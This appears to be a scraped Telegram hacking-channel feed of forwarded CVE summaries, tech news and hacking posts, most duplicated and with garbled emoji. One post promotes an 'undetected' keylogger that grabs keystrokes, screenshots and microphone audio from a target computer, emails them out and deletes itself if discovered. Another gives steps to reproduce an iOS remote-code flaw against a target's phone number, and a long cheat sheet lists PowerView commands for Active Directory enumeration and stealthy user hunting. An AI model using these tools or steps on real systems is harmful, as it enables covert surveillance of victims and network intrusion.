Forwarded from UNDERCODE NEWS
Forwarded from DailyCVE
Dailycve
Plone XXE attacks | CVE
Details:
Plone is a Zope Technology Server-based open source content management system (CMS). In Plone versions prior to 5.2.3, there is a security vulnerability which allows XXE attacks to be carried out without permission through features protected byβ¦
Plone is a Zope Technology Server-based open source content management system (CMS). In Plone versions prior to 5.2.3, there is a security vulnerability which allows XXE attacks to be carried out without permission through features protected byβ¦
π¦free recommended project Haka:
An open source security oriented language which allows to describe protocols and apply security policies on (live) captured traffic. The scope of Haka language is twofold. First of all, it allows to write security rules in order to filter/alter/drop unwanted packets and log and report malicious activities. Second, Haka features a grammar enabling to specify network protocols and their underlying state machine.
Β» http://www.haka-security.org
An open source security oriented language which allows to describe protocols and apply security policies on (live) captured traffic. The scope of Haka language is twofold. First of all, it allows to write security rules in order to filter/alter/drop unwanted packets and log and report malicious activities. Second, Haka features a grammar enabling to specify network protocols and their underlying state machine.
Β» http://www.haka-security.org
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
The truth of the 'phantom market merger' of NEC / Fujitsu, the Hinomaru Union set up by NTTT.
#International
#International
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack/ Pentesting ios browser's with bug: guide
https://bugs.chromium.org/p/project-zero/issues/detail?id=1858
1) The class _NSDataFileBackedFuture can be deserialized even if secure encoding is enabled.
2) This class is a file-backed NSData object that loads a local file into memory when the [NSData bytes] selector is called.
3) This presents two problems. First, it could potentially allow undesired access to local files if the code deserializing the buffer ever shares it (this is more likely to cause problems in components that use serialized objects to communicate locally than in iMessage).
4) Second, it allows an NSData object to be created with a length that is different than the length of its byte array. This violates a very basic property that should always be true of NSData objects. This can allow out of bounds reads, and could also potentially lead to out-of-bounds writes, as it is now possible to create NSData objects with very large sizes that would not be possible if the buffer was backed.
π¦To reproduce the issue with the files in filebacked.zip:
1) install frida (pip3 install frida)
2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
in injectMessage.js replace the marker "PATH" with the path of the obj file
3) in the local directory, run:
4) python3 sendMessage.py
Please note that the attached repro case is a simple example to demonstrate the reach-ability of the class in Springboard. The actual consequences of the bug are likely more serious. This PoC only works on devices with iOS 12 or later.
code/ref :
https://github.com/TinToSer/ios-RCE-Vulnerability
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack/ Pentesting ios browser's with bug: guide
https://bugs.chromium.org/p/project-zero/issues/detail?id=1858
1) The class _NSDataFileBackedFuture can be deserialized even if secure encoding is enabled.
2) This class is a file-backed NSData object that loads a local file into memory when the [NSData bytes] selector is called.
3) This presents two problems. First, it could potentially allow undesired access to local files if the code deserializing the buffer ever shares it (this is more likely to cause problems in components that use serialized objects to communicate locally than in iMessage).
4) Second, it allows an NSData object to be created with a length that is different than the length of its byte array. This violates a very basic property that should always be true of NSData objects. This can allow out of bounds reads, and could also potentially lead to out-of-bounds writes, as it is now possible to create NSData objects with very large sizes that would not be possible if the buffer was backed.
π¦To reproduce the issue with the files in filebacked.zip:
1) install frida (pip3 install frida)
2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
in injectMessage.js replace the marker "PATH" with the path of the obj file
3) in the local directory, run:
4) python3 sendMessage.py
Please note that the attached repro case is a simple example to demonstrate the reach-ability of the class in Springboard. The actual consequences of the bug are likely more serious. This PoC only works on devices with iOS 12 or later.
code/ref :
https://github.com/TinToSer/ios-RCE-Vulnerability
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - TinToSer/ios-RCE-Vulnerability: Latest ios RCE Vulnerability disclosed by Google Security Researcher
Latest ios RCE Vulnerability disclosed by Google Security Researcher - TinToSer/ios-RCE-Vulnerability
Forwarded from DailyCVE
Dailycve
Umbraco path traversal vulnerability | CVE
Details:
Umbraco is a Content Management System (CMS) open source written by Umbraco, Denmark, in C#. There is a path traversal flaw in Umbraco CMS 8.9.1 and earlier versions, allowing arbitrary files to be written outside the home directory of the site andβ¦
Umbraco is a Content Management System (CMS) open source written by Umbraco, Denmark, in C#. There is a path traversal flaw in Umbraco CMS 8.9.1 and earlier versions, allowing arbitrary files to be written outside the home directory of the site andβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Undetected. Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
#Hacking
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
β’ DOWNLOAD : https://github.com/aydinnyunus/Keylogger
β’Set your own MAIL and PASSWORD on "keylogger.py".
β’Run keylogger.py on Target Computer
β’Every 10 seconds,You Get the Data from the Target Computer
β’If Target finds the Code and Open the File for Want to Learn your MAIL and Password The Program DELETE itself.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Undetected. Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
#Hacking
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
β’ DOWNLOAD : https://github.com/aydinnyunus/Keylogger
β’Set your own MAIL and PASSWORD on "keylogger.py".
β’Run keylogger.py on Target Computer
β’Every 10 seconds,You Get the Data from the Target Computer
β’If Target finds the Code and Open the File for Want to Learn your MAIL and Password The Program DELETE itself.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - aydinnyunus/Keylogger: Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail. - aydinnyunus/Keylogger
Forwarded from DailyCVE
Dailycve
AIRDROPX BORN security vulnerability | CVE
Details:
AIRDROPX BORN is an AIRDROPX BORN API token service which can be used for Bitcoin and other network currencies to be transferred and exchanged. Version 2019-05-29 of AIRDROPX BORN and older versions have a security flaw.
The flaw derives from a constructor'sβ¦
AIRDROPX BORN is an AIRDROPX BORN API token service which can be used for Bitcoin and other network currencies to be transferred and exchanged. Version 2019-05-29 of AIRDROPX BORN and older versions have a security flaw.
The flaw derives from a constructor'sβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A cheat sheet that contains common enumeration and attack methods for Windows Active Directory:
Enum Domain Computers:
Get-NetComputer -FullData
Get-DomainGroup
#Enumerate Live machines
Get-NetComputer -Ping
Enum Groups and Group Members:
Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName>
#Enumerate the members of a specified group of the domain
Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member
#Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Enumerate Shares
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
Enum Group Policies:
Get-NetGPO
# Shows active Policy on specified machine
Get-NetGPO -ComputerName <Name of the PC>
Get-NetGPOGroup
#Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName <ComputerName>
Enum OUs:
Get-NetOU -FullData
Get-NetGPO -GPOname <The GUID of the GPO>
Enum ACLs:
# Returns the ACLs associated with the specified account
Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
#Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Enum Domain Trust:
Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>
Enum Forest Trust:
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>
#Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>
#Map the Trust of the Forest
Get-NetForestTrust
Get-NetDomainTrust -Forest <ForestName>
User Hunting:
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose
#Find computers were a Domain Admin OR a spesified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
#Confirming admin access:
Invoke-UserHunter -CheckAccess
AVAIBLE HERE Β» : https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A cheat sheet that contains common enumeration and attack methods for Windows Active Directory:
Enum Domain Computers:
Get-NetComputer -FullData
Get-DomainGroup
#Enumerate Live machines
Get-NetComputer -Ping
Enum Groups and Group Members:
Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName>
#Enumerate the members of a specified group of the domain
Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member
#Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Enumerate Shares
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
Enum Group Policies:
Get-NetGPO
# Shows active Policy on specified machine
Get-NetGPO -ComputerName <Name of the PC>
Get-NetGPOGroup
#Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName <ComputerName>
Enum OUs:
Get-NetOU -FullData
Get-NetGPO -GPOname <The GUID of the GPO>
Enum ACLs:
# Returns the ACLs associated with the specified account
Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
#Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Enum Domain Trust:
Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>
Enum Forest Trust:
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>
#Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>
#Map the Trust of the Forest
Get-NetForestTrust
Get-NetDomainTrust -Forest <ForestName>
User Hunting:
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose
#Find computers were a Domain Admin OR a spesified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
#Confirming admin access:
Invoke-UserHunter -CheckAccess
AVAIBLE HERE Β» : https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methodsβ¦
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Is the iPhone folding screen coming? Two prototypes are subject to preliminary testing.
#Technologies
#Technologies
